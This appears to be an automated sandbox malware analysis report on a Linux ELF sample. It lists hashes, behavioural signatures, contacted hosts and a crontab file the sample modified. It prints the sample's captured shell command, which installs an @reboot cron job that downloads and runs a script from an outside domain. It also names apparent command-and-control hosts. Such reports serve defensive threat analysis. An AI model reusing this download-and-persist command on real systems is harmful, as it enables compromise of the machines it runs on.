Malware Analysis Report

2024-11-15 08:23

Sample ID 241028-blj5astrdm
Target 47ee0b8842a526fc0c6ff94fe4ca2ad6.bin
SHA256 5f304253a32307d60af3514a24984339039a8131526d81e7091b34ba27d76193
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

5f304253a32307d60af3514a24984339039a8131526d81e7091b34ba27d76193

Threat Level: Shows suspicious behavior

The file 47ee0b8842a526fc0c6ff94fe4ca2ad6.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:13

Reported

2024-10-28 01:16

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

149s

Max time network

136s

Command Line

[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 80.152.203.134 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.FJlr1F /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1573/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1/cmdline /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/mounts /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A

Processes

/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf

[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 80.152.203.134:53 kingstonwikkerink.dyn udp
CZ 195.133.92.51:10701 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.FJlr1F

MD5 83171e3b993f7e5156610ec021956f99
SHA1 50d0c29250d3df506f2d6d45a6df96ca0164d4ce
SHA256 dd334f58ab4dcad925152e554fd9fc0a491f92e0c2ae992bdb2224be25a6cc4a
SHA512 34b475c5ea363b48102a902ea127d4f165f435cb85aa1b0dd3ade0cc92e57ff84ccf963dc0688302749992bdc4d834c10b1f75db6b913e07ed5cd814d637106f